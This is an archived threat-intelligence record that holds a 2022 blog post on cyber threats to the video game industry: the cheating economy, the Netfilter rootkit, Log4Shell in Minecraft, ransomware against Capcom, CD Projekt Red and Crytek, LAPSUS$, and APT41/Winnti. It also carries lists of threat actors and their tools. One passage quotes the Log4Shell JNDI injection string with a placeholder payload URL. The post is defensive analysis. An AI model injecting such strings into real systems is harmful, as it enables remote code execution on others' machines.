{
	"id": "5d24e7f4-2d03-4fcd-a226-9d907873a291",
	"created_at": "2026-04-06T02:12:34.654837Z",
	"updated_at": "2026-04-10T03:32:46.24182Z",
	"deleted_at": null,
	"sha1_hash": "165111901e0523e89e0ae7c5ad882d8519b08460",
	"title": "Gamer Cheater Hacker Spy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3000244,
	"plain_text": "Gamer Cheater Hacker Spy\r\nBy BushidoToken\r\nPublished: 2022-05-01 · Archived: 2026-04-06 01:36:11 UTC\r\nThe title of this blog is a homage to the film Tinker Tailor Soldier Spy and presents the fact that video games and\r\ncheating are also tied to hacking and spying. It is a common trope in cybersecurity that professionals first became\r\ninterested in the field through an encounter while playing games. Speaking personally, I first became\r\nenthralled with hacking in 2008 by matching against some modders using hacked weapons while playing Halo\r\n3 (my favourite game of all time).\r\nThis blog aims to highlight why monitoring the video game industry is important for cyber threat intelligence\r\nanalysts hunting down the latest threats. Video games and hacking are very intertwined. Many hackers start out by\r\ncreating cheats for games, and have to play the games to begin with to learn how to hack them. \r\nThere are also several notable incidents whereby hacking in video games escalated to become critical issues for\r\nthe software development industry and enterprise security realms. This includes zero-day exploits, stolen code-signing certificates, rootkit development, and supply-chain attacks, as well as ransomware and intellectual\r\nproperty theft.\r\nThe Video Game Cheating Industry\r\nCheating in video games is as old as the industry itself. However, nowadays cheating is a massive multi-billion\r\ndollar underground economy. What was once only done by a small group of hackers has evolved into massive\r\ncriminal enterprises, selling Cheats-as-a-Service. \r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 1 of 12\n\nIn March 2021, the BBC reported that Chinese police worked with Tencent to disrupt one of the largest video-game-cheating operations ever. The perpetrators designed and sold cheats for popular games, such as Overwatch\r\nand Call of Duty. 
Approximately $76m (£55m) in revenue was made by the criminal business, which charged a\r\nsubscription fee to clients. Subscription prices for users began at around $10 a day, and up to $200 a month.\r\nIn June 2021, security researcher Karsten Hahn uncovered a new rootkit signed by Microsoft. Later, Microsoft\r\npublished a blog investigating a threat actor distributing a malicious signed driver, dubbed the Netfilter rootkit,\r\nwithin gaming environments. The operation was able to trick Microsoft into signing their code by submitting\r\ndrivers for certification through the Windows Hardware Compatibility Program. The implications here were\r\nmassive; however, the malicious actor’s activity was limited to the gaming sector, specifically in China. Microsoft\r\nalso said they believed the aim of the driver was to gain an advantage in games and possibly exploit other players\r\nby compromising their accounts through common tools like keyloggers. \r\nMalicious software (malware) like the Netfilter rootkit is common in the gaming industry because, to defeat\r\nanti-cheat systems, cheat code often has to run at a lower level than normal Windows operating system\r\n(OS) applications, in kernel mode.\r\nHackers in Games\r\nOne of the most critical events in recent gaming history was Log4Shell, a vulnerability also known as CVE-2021-44228\r\nwith a CVSS score of 10.0. It was first uncovered by the Alibaba Security team and disclosed on 9\r\nDecember 2021 and was exploited immediately afterwards by a range of threats, including botnets, ransomware,\r\nand advanced persistent threat (APT) groups - but it all started in Minecraft. At the time of this writing, even five\r\nmonths since it was initially disclosed, thousands of applications remain vulnerable to Log4Shell.\r\nLog4Shell was a zero-day vulnerability in the ubiquitous Apache Log4j logging library that, if exploited successfully,\r\ncould lead to remote code execution (RCE) on the targeted device. 
Log4Shell is also trivial to exploit. It can be\r\ndone by pasting \"${jndi:ldap://\u003cURL to payload\u003e}\" into an input field and waiting for Log4j to fetch the\r\nremote payload and execute it, opening a backdoor on the affected system.\r\nUsing Log4Shell, hackers quickly began exploiting the popular video game Minecraft. When a user pasted the\r\nstring into a message, they could compromise the entire Minecraft server and other players' systems. This soon\r\nbecame known as the \"worst week in Minecraft history\". As soon as players began to see this message pop up on\r\ntheir screens, panic ensued. \r\nAs they began to realize that the cause was the Log4Shell exploit, others joined in and began to leverage it for\r\nmalicious attacks in Minecraft, and in other games such as Dark Souls 3. This included exploiting Log4Shell to\r\ncompromise other players' accounts and steal or destroy their in-game items, which can take months or\r\nyears to acquire and can be worth hundreds or thousands of real dollars.\r\nFigure 1. Log4Shell exploited in Minecraft\r\nHistorical Cybersecurity Incidents In The Gaming Industry\r\nVideo game developers and publishers receive many of the same threats that organizations such as banks or\r\ngovernments may receive. To emphasize the severity of the threat, Microsoft has an entire division and security\r\noperations center (SOC) dedicated to protecting the Xbox Live Network and development. 
\r\nA variety of notable cybersecurity incidents that affected major household names are as follows:\r\n- In 2003, Half-Life 2's source was stolen after the email of Valve's co-founder Gabe Newell was\r\ncompromised and the entire Half-Life 2 source tree was downloaded from his computer\r\n- In October 2014, four people were charged in the US and one in Australia for their alleged involvement in\r\na hacking ring known as Xbox Underground that stole source code and intellectual property from a variety\r\nof games companies and Microsoft\r\n- In October 2016, two teenage members of Lizard Squad and PoodleCorp were arrested for launching\r\nDistributed Denial of Service (DDoS) attacks against Pokémon GO servers and ruining gamers’ Christmas\r\nwith a DDoS against the servers that power PlayStation and Xbox consoles\r\n- In March 2019, Dr. Web researchers discovered that 39% of all existing Counter-Strike 1.6 game servers were\r\nbeing used by malicious actors in attempts to infect players with the Belonard Trojan botnet by exploiting\r\ngame client vulnerabilities\r\n- In April 2020, the source code of Valve's Team Fortress 2 and Counter-Strike: Global Offensive games was\r\nre-leaked on the Internet for anyone to download after already being leaked in 2018\r\n- Also in April 2020, 160,000 Nintendo customer accounts were hijacked via credential stuffing, which led\r\nto Nintendo disconnecting the NNID legacy login system from main Nintendo profiles\r\n- In December 2021, security researchers disclosed that they found several sets of Amazon Web Services\r\n(AWS) keys in an exposed S3 bucket, with which it was possible to run scripts and upload files to\r\nSEGA Europe domains\r\nThe Game Industry Is Targeted By Organized Cybercriminals\r\nLike any software development company, many large games companies will have corporate networks that can be\r\ntargeted by cybercriminals and advanced persistent 
threat (APT) groups for extortion or intellectual property theft.\r\nThere have been a number of high-profile and painful ransomware attacks against household names. Chinese-speaking APT groups have also targeted games companies for a variety of reasons, including intellectual property\r\ntheft and important artefacts such as code-signing certificates. These incidents are a lot more serious than account\r\nhijacking or cheating; they verge into the corporate espionage and organized cybercrime realms.\r\nCrytek and Ubisoft\r\nIn October 2020, video game developer Crytek fell victim to an Egregor ransomware attack, which subsequently\r\nalso reportedly affected Ubisoft. In addition to encrypting devices on Crytek's network, the Egregor operators\r\nstole unencrypted files from the company and leaked a 380MB archive on the group's darknet leak site containing data\r\nfrom WarFace and Crytek's cancelled Arena of Fate MOBA game. The Egregor operators also allegedly managed to\r\nsteal data pertaining to Ubisoft's Watch Dogs: Legion game (which is ironically all about hacking). On\r\n28 October, Egregor posted a 500GB archive containing assets from the game.\r\nFigure 2. Ubisoft and Crytek appearing on Egregor's darknet leak site\r\nEgregor ransomware appeared in September 2020 and was the heir apparent to the infamous Maze ransomware\r\ngroup, which first emerged in May 2019. Both Egregor and Maze, as well as Sekhmet, were attributed to the same\r\ngroup of organized cybercriminals, tracked together by CrowdStrike under the TwistedSpider cryptonym. For\r\nEgregor, initial access was gained through the use of the QakBot banking Trojan, the targeting of unpatched\r\nVirtual Private Network (VPN) appliances, and Remote Desktop Protocol (RDP) services. 
In February 2022, 14\r\nmonths after the group shuttered its data leak sites and ceased attacks, the master decryption keys for the Maze,\r\nEgregor, and Sekhmet ransomware operations were released on the BleepingComputer forums by the alleged\r\nmalware developer.\r\nCAPCOM\r\nJapanese games developer Capcom is well-known for its iconic game franchises, including Street Fighter,\r\nResident Evil, Devil May Cry, Monster Hunter, and Mega Man. In November 2020, the company announced it\r\nwas hit by a crippling ransomware attack. The attack was orchestrated by the RagnarLocker group (aka\r\nVikingSpider), a Russian-speaking organized cybercriminal group. The threat group's previous victims include\r\nEnergias de Portugal, CMA CGM, and Campari. In each case, the group demanded between $10-$15 million in\r\nransom for the decryption keys and to prevent stolen data from being published on the group's data leak blog\r\nhosted on the darknet.\r\nThe RagnarLocker threat actors claimed in the ransom note (see Figure 2) that they stole up to 1TB of sensitive data\r\nfrom Capcom's corporate networks in Japan, the US, and Canada. This included intellectual property, employee\r\npersonal data, sensitive emails, and non-disclosure agreements. The group also threatened to leak and/or sell the\r\nstolen data if the ransom was not paid. Further, the ransom note included screenshots of stolen files as well as\r\na list of Active Directory users and computers for the Capcom Windows domain. Security\r\nresearcher Pancak3 also told BleepingComputer that RagnarLocker claimed to have encrypted up to 2,000 devices\r\non Capcom's networks and was demanding $11 million in Bitcoin for a decryptor.\r\nFigure 3. 
RagnarLocker ransom note and leak site targeting Capcom\r\nIn January 2021, Capcom made a statement on the breach and disclosed that it suspected the data of up to 390,000\r\npeople was likely stolen. Capcom said the exposed data could be a mix of names, addresses, phone numbers, HR\r\ninformation, and email addresses. In April 2021, Capcom released a final statement on the November 2020\r\nRagnarLocker ransomware incident. The company said it had recovered from the attack, around six months since\r\nthe incident started. Capcom's final assessment regarding the data breach was that only 15,649 individuals were\r\nimpacted, and those individuals were notified of their exposure. Stolen information also did not include payment card details, only\r\ncorporate and personally identifiable data. Digital forensics experts also identified that the Ragnar Locker\r\noperators gained initial access to Capcom’s internal network by exploiting a vulnerability in an unpatched VPN\r\ndevice located at the company’s North American subsidiary in California. From there, the adversary pivoted to\r\ndevices in offices in the US and Japan and executed the ransomware on 1 November 2020, causing email and file\r\nservers to be taken offline.\r\nCD PROJEKT RED\r\nOn 9 February 2021, CD Projekt Red (CDPR), creator of the popular Witcher game series and Cyberpunk 2077,\r\nannounced that it was the victim of a ransomware attack by a threat group using a ransomware variant that Emsisoft's Fabian\r\nWosar identified as HelloKitty (aka DeathKitty). The threat group responsible also claimed in the ransom note\r\n(see Figure 3) to have stolen the source code from several of CDPR's games. \r\nThe next day, on 10 February, vx-underground tweeted that CDPR's data had been leaked to an infamous Russian-speaking cybercrime forum known as Exploit[.]in. 
VICE Motherboard journalists obtained a copy of the data on a\r\nlow-level hacking and data trading forum and downloaded it for verification purposes. The data included assets\r\nfrom CDPR's Witcher spin-off game, Gwent. The cybercriminals responsible then posted about an auction of the\r\ndata for \"1kk$\" (which reportedly equals $1 million in underground Russian cybercriminal slang).\r\nFigure 4. HelloKitty ransom note and data leak targeting CD Projekt Red\r\nFrom the start, CDPR did not submit to the cybercriminals' demands. CDPR's statement at the time said \"We will\r\nnot give in to the demands nor negotiate with the actor, being aware that this may eventually lead to the release of\r\nthe compromised data.\" The company added that the hackers had \"successfully encrypted some devices\" on\r\nCDPR's network, but that the company had backups and had begun restoring the data.\r\nElectronic Arts\r\nIn June 2021, Electronic Arts (EA) fell victim to a sophisticated social engineering attack that led to the theft of up\r\nto 780GB of proprietary source code from the FIFA franchise and its Frostbite game engine. The hacker and their\r\nassociates were part of a group that later dubbed itself LAPSUS$ and would go on to wreak havoc at top companies\r\nsuch as Microsoft, Nvidia, Vodafone, and Okta, as well as Ubisoft, according to its Telegram channel.\r\nEA confirmed to VICE Motherboard that it had suffered a data breach and that the information listed by the\r\nhackers was the data that was stolen. The disturbing breach at EA was indicative of things to come. The LAPSUS$\r\ngroup used a combination of social engineering, cybercrime underground markets selling stolen credentials and\r\ncookies, SIM swapping, and some relatively simple techniques to compromise Windows systems. 
\r\nA leaked incident response report showed that once a LAPSUS$ member gained access to a\r\ncompromised Windows system via RDP, they would use Microsoft Bing to find hacking tools and exploits,\r\nsuch as ProcessHacker and Mimikatz, download them from GitHub, turn off the victim's Endpoint Detection and Response\r\n(EDR) protection, dump credentials from the system's memory, and then copy them to Pastebin.\r\nFigure 5. Threat actors connected to LAPSUS$ advertise stolen EA source code\r\nWhat made LAPSUS$ so interesting was that their unique set of skills proved to be highly effective against\r\ncompanies with some of the best enterprise security defences in the world. These teenage hackers began by\r\ntargeting a games company and went on to hit a company like Okta, which is used not only by hundreds of\r\nFortune 500 companies but also by governments worldwide. The motivation of LAPSUS$ appeared to be financial gain;\r\nhowever, as the hacks got more brazen, it seemingly became a quest for notoriety and infamy. The group had a\r\nTelegram channel with up to 47,000 subscribers and would brag about each hack on it. Ultimately, on 24 March\r\n2022, British police arrested seven suspects aged between 16 and 21 who were reportedly part of the gang.\r\nThe story did not end there, though. On 30 March, LAPSUS$ posted details about another breach against the\r\nsoftware consultancy giant Globant, where the group had stolen 70GB of data, including customer source code.\r\nFurther, on 22 April, KrebsOnSecurity obtained a copy of the private chat messages between members of the\r\nLAPSUS$ cybercrime group. The leaked chats revealed that LAPSUS$ also breached T-Mobile (Deutsche\r\nTelekom) multiple times in March 2022, stealing source code for a range of company projects. \r\nAnother disturbing revelation to come out of the LAPSUS$ campaign was the group's use of fake emergency data\r\nrequests. 
This is where the cybercriminals used a compromised police or government department\r\nemail account to request emergency access to personal subscriber information from internet service providers,\r\nphone companies and social media firms, under the pretext that the request did not require a warrant because\r\nsomebody's life was at risk. The companies would often comply because the request appeared to be an emergency and came from a\r\nlegitimate but compromised government or police email address.\r\nAPTs Hacking Games Companies For Espionage And Profit\r\nSince at least 2009, a sophisticated Chinese hacking group known as Winnti has targeted the gaming industry. The\r\nWinnti threat group's other cryptonyms include APT41, BARIUM, WickedPanda, and WickedSpider. The gaming\r\nindustry is not Winnti's only target, however, as the group has infiltrated over 100 victim companies in the US and\r\nabroad, including software development companies, computer hardware manufacturers, telecommunications\r\nproviders, social media companies, non-profit organizations, universities, think tanks, and foreign governments, as\r\nwell as pro-democracy politicians and activists in Hong Kong. Five members of APT41 were indicted by the US\r\nDepartment of Justice in September 2020, with an additional two members arrested in Malaysia. US prosecutors\r\naccused the two of working on behalf of the Chinese government’s intelligence agency, the Guangdong State\r\nSecurity Department (GSSD) of the Ministry of State Security (MSS).\r\nIn April 2013, Kaspersky disclosed a report called “Winnti - More than just a game”. The researchers reported that\r\nin Q3 2011, the Winnti group's malware was detected on a large number of computers that were linked together\r\nthrough the shared use by players of a popular online game. It was later revealed that the malware landed on the\r\nplayers' systems as part of a regular update from the game's official update server. 
This made it one of the first of\r\nseveral software supply-chain attacks orchestrated by this threat group. APT41 would go on to orchestrate the\r\ninfamous CCleaner supply-chain attack years later in September 2017.\r\nKaspersky researchers uncovered that the code-signing certificate used to sign the original Winnti malware was stolen\r\nfrom another video game vendor known as KOG, based in South Korea. The researchers then found that between\r\n2011 and 2013, the Winnti group had used at least 18 stolen code-signing certificates in its campaigns, all\r\nbelonging to video games companies from South Korea, Japan, the Philippines, China, and the US.\r\nFigure 6. APT41 indicted by the Department of Justice in September 2020\r\nThe hacking of video games companies by a sophisticated state-sponsored adversary seemed unusual, given that\r\nduring the same timeframe Chinese APTs had targeted Google, Adobe, and the New York Times.\r\nMany security experts were curious why Chinese intelligence agencies were heavily investing resources into\r\nhacking games companies. 
\r\nPotential Winnti objectives for targeting the gaming industry:\r\nObjective 1 - Online games could be exploited to accumulate in-game currency, which could be resold for\r\nreal currency\r\nObjective 2 - Source code theft could be used to find exploits in the software to support Objective 1\r\nObjective 3 - Having zero-day exploits in any software is advantageous for an intelligence agency as it\r\ngrants the ability to target other organizations and individuals\r\nObjective 4 - Stealing personal customer data\r\nObjective 5 - Stealing software inventions and innovations to support other industries, such as military\r\ncombat simulators\r\nObjective 6 - Stealing intellectual property to reproduce in their own domestic gaming industry\r\nObjective 7 - Repurposing resources like code-signing certificates and email accounts for other cyber-espionage campaigns\r\nAdditionally, in March 2019 and April 2020, security researchers from ESET and QuoIntelligence, respectively,\r\ndisclosed further campaigns linked to the Winnti group against the video games industry, indicating that these\r\nadversaries continue to spy on games companies, primarily in Asia, as much as 10 years after the campaign began.\r\nIn March 2021, ESET also disclosed another campaign reminiscent of previous Winnti attacks but did not\r\nformally attribute it to the APT group. The researchers uncovered a software supply-chain attack against\r\nemulation software, NoxPlayer, to install surveillance malware on the computers of online gamers. The maker of\r\nNoxPlayer, BigNox, says the software has 150 million users in 150 countries. BigNox's infrastructure was\r\nreportedly compromised by an adversary to push a malicious update. 
In some cases, additional payloads\r\nwere also downloaded by the BigNox updater from attacker-controlled servers.\r\nSo What?\r\nHopefully this blog highlights the fact that it is particularly important to monitor the cyber threat landscape of the\r\ngaming industry. There have been several occasions where a cyber incident began in the gaming sector and\r\neventually worked its way into the software industry, and thus into all other sectors: the Log4Shell\r\nevent, several software supply-chain attacks, digital certificate theft campaigns, and intellectual property theft\r\ncampaigns, among others. Although these incidents may have started in the gaming industry, they eventually affected\r\ntop companies, such as Microsoft. \r\nIn my experience, hackers have often started out by hacking their favourite game. They either reverse engineer it\r\nthemselves, learn from others, or encounter other hackers online. This then leads to cheating and/or selling cheats\r\nand techniques, and potentially zero-day exploit development. 
Although some of these larger cheating shops may\r\npossess the ability to discover a zero-day vulnerability or develop a Proof-of-Concept (PoC) exploit to support\r\ntheir cheats, the ramifications extend much further, affecting the entire enterprise IT ecosystem.\r\nKey reasons to monitor the gaming industry cyber threat landscape:\r\n- From a Cyber Threat Intelligence (CTI) perspective, it can be useful to monitor hacking activities in the\r\ngaming communities as it can sometimes lead to corporate enterprise security \r\n- Also from a CTI perspective, the tactics, techniques, and procedures (TTPs) that affect video game\r\ncompanies will affect the software industry, and thus all other sectors\r\n- From a detection engineering perspective, monitoring the cheating industry for the latest rootkit\r\ndevelopments and anti-cheat bypasses is important to identify the latest techniques leveraged in\r\nthe wild for bypassing defences\r\n- From a software development perspective, it would also be useful to monitor the development of bypasses\r\nfor copyright protection and anti-piracy protections of games\r\nAdditional Resources\r\nGames companies that have appeared on Have I Been Pwned?\r\nSony PSN in 2011, Dungeons \u0026 Dragons Online in 2013, LOTR Online in 2013, Warframe in\r\n2014, Epic Games in 2016, SubaGames in 2016, Evony in 2016, Unreal Engine forum in 2016, CD\r\nProjekt Red in 2017, BlankMediaGames in 2018, Mortal Online in 2018, Armor Games in 2019,\r\nIDC Games in 2021\r\nDarknet Diaries Episodes on Hacking Online Video Games for Fun\r\nPart I - https://darknetdiaries.com/episode/7/\r\nPart II - https://darknetdiaries.com/episode/8/\r\nDarknet Diaries Episodes on Xbox Underground\r\nPart I - https://darknetdiaries.com/episode/45/\r\nPart II - https://darknetdiaries.com/episode/46/\r\nDarknet Diaries Episode on the Video Game Cheating 
Industry\r\nhttps://darknetdiaries.com/episode/115/\r\nSource: https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html"
	],
	"report_names": [
		"gamer-cheater-hacker-spy.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "be5097b2-a70f-490f-8c06-250773692fae",
			"created_at": "2022-10-27T08:27:13.22631Z",
			"updated_at": "2026-04-10T02:00:05.311385Z",
			"deleted_at": null,
			"main_name": "LAPSUS$",
			"aliases": [
				"LAPSUS$",
				"DEV-0537",
				"Strawberry Tempest"
			],
			"source_name": "MITRE:LAPSUS$",
			"tools": [
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d4b9608d-af69-43bc-a08a-38167ac6306a",
			"created_at": "2023-01-06T13:46:39.335061Z",
			"updated_at": "2026-04-10T02:00:03.291149Z",
			"deleted_at": null,
			"main_name": "LAPSUS",
			"aliases": [
				"Lapsus",
				"LAPSUS$",
				"DEV-0537",
				"SLIPPY SPIDER",
				"Strawberry Tempest",
				"UNC3661"
			],
			"source_name": "MISPGALAXY:LAPSUS",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5bbced13-72f7-40dc-8c41-dcce75bf885e",
			"created_at": "2022-10-25T15:50:23.695735Z",
			"updated_at": "2026-04-10T02:00:05.335976Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"Winnti Group"
			],
			"source_name": "MITRE:Winnti Group",
			"tools": [
				"PipeMon",
				"Winnti for Windows",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2347282d-6b88-4fbe-b816-16b156c285ac",
			"created_at": "2024-06-19T02:03:08.099397Z",
			"updated_at": "2026-04-10T02:00:03.663831Z",
			"deleted_at": null,
			"main_name": "GOLD RAINFOREST",
			"aliases": [
				"Lapsus$",
				"Slippy Spider ",
				"Strawberry Tempest "
			],
			"source_name": "Secureworks:GOLD RAINFOREST",
			"tools": [
				"Mimikatz"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "52d5d8b3-ab13-4fc4-8d5f-068f788e4f2b",
			"created_at": "2022-10-25T16:07:24.503878Z",
			"updated_at": "2026-04-10T02:00:05.014316Z",
			"deleted_at": null,
			"main_name": "Lapsus$",
			"aliases": [
				"DEV-0537",
				"G1004",
				"Slippy Spider",
				"Strawberry Tempest"
			],
			"source_name": "ETDA:Lapsus$",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441554,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/165111901e0523e89e0ae7c5ad882d8519b08460.pdf",
		"text": "https://archive.orkl.eu/165111901e0523e89e0ae7c5ad882d8519b08460.txt",
		"img": "https://archive.orkl.eu/165111901e0523e89e0ae7c5ad882d8519b08460.jpg"
	}
}